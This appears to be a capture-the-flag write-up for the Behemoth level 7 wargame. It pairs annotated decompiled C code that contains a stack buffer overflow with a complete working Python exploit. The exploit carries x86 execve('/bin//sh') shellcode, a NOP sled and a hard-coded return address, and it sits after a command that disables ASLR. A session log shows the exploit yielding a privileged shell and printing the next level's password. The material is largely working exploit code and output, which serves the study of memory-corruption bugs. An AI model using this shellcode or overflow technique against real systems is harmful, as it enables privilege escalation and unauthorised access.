Behemoth7
Recordamos deshabilitar ASLR con:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
/* Decompiled main of /behemoth/behemoth7 (Ghidra-style output: the undefined4 /
 * ushort types and the raw pointer arithmetic are the decompiler's, not the
 * author's). By position the three parameters are argc, argv and envp; Ghidra
 * did not recover those types, so treat that as an inference to confirm against
 * the binary. The `+ 4` / `* 4` strides mean 4-byte pointers, i.e. a 32-bit target. */
undefined4 main(int param_1,int param_2,int param_3)
{
size_t __n;
ushort **ppuVar1;
char local_210 [512];  /* fixed 512-byte stack buffer; the only thing written to below */
int local_10;          /* how many bytes of argv[1] the character filter has inspected */
int Contador1;         /* index into the param_3 pointer array */
char *local_8;         /* cursor walking argv[1] */
local_8 = *(char **)(param_2 + 4);   /* second 4-byte slot of param_2: argv[1] on a 32-bit target */
Contador1 = 0;
/* Zero every string reachable from param_3 in place, up to its terminating NUL,
 * stopping at the NULL entry. If param_3 is envp (presumably) this wipes the
 * environment so no caller-supplied data survives there; it is a hardening step
 * around the copy below, not a fix for it. */
while (*(int *)(param_3 + Contador1 * 4) != 0) {
__n = strlen(*(char **)(param_3 + Contador1 * 4));
memset(*(void **)(param_3 + Contador1 * 4),0,__n);
Contador1 = Contador1 + 1;
}
local_10 = 0;
if (1 < param_1) {   /* argc > 1: an argument was supplied */
/* Character filter over argv[1]. Note the second condition: it gives up after
 * 0x200 (512) characters, so anything past index 511 is never inspected. */
while ((*local_8 != '\0' && (local_10 < 0x200))) {
local_10 = local_10 + 1;
ppuVar1 = __ctype_b_loc();
/* glibc ctype table lookup. 0x400 and 0x800 match the little-endian _ISalpha and
 * _ISdigit class bits (isalpha / isdigit), so the branch fires for any
 * non-alphanumeric byte — consistent with the "Non-alpha" message it prints. */
if ((((*ppuVar1)[*local_8] & 0x400) == 0) &&
(ppuVar1 = __ctype_b_loc(), ((*ppuVar1)[*local_8] & 0x800) == 0)) {
fprintf(stderr,"Non-%s chars found in string, possible shellcode!\n","alpha");
/* WARNING: Subroutine does not return */
exit(1);
}
local_8 = local_8 + 1;
}
/* BUG: unbounded copy of the full argv[1] into the 512-byte local_210. The filter
 * above neither limits the length nor looks beyond the first 512 bytes, so a longer
 * argument overruns the buffer and overwrites whatever lies above it on the stack
 * (typically the saved frame pointer and return address). Fix on the code side:
 * reject the argument when strlen() >= sizeof(local_210), or use a bounded copy
 * (strncpy/snprintf with sizeof(local_210)), and require the filter to have reached
 * the NUL rather than the 0x200 cap. Stack protector, NX and ASLR (disabled for
 * this exercise, see the note at the top of the page) reduce the impact but do not
 * remove the defect. */
strcpy(local_210,*(char **)(param_2 + 4));
}
return 0;
}
from struct import *
import sys
# Builds the argv[1] string for the decompiled behemoth7 main above and writes it
# raw to stdout. Written for Python 2: `str` is a byte string there, so each "\x.."
# escape below is emitted as exactly one byte.
SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"  # 21 bytes; the embedded ASCII reads "//sh" and "/bin", matching the shell seen in the session below
# 512 'A's: exactly sizeof(local_210) in main, and exactly the 0x200 bytes its
# alphanumeric filter inspects — everything after this point is never validated,
# which is precisely the gap the unbounded strcpy leaves open.
OFFSET = 'A'*512+'BBBB'*4
NOP_SLED = "\x90"*50  # 50 x86 NOP bytes
# Native-endian 4-byte value (little-endian on x86). It is a hard-coded stack address,
# so it is only meaningful with randomize_va_space set to 0 as done at the top of the
# page; with ASLR enabled the stack moves between runs and this value goes stale.
DIR_SHELLCODE = pack("I",0xffffd460 )
PAYLOAD = OFFSET+DIR_SHELLCODE+NOP_SLED+SHELLCODE
sys.stdout.write(PAYLOAD)  # raw write, no trailing newline, so $(...) passes it through unchanged
behemoth7@behemoth:/tmp/Marmeus$ /behemoth/behemoth7 $(python E7.py)
$ id
uid=13007(behemoth7) gid=13007(behemoth7) euid=13008(behemoth8) groups=13007(behemoth7)
$ cat /etc/behemoth_pass/behemoth8
pheewij7Ae
$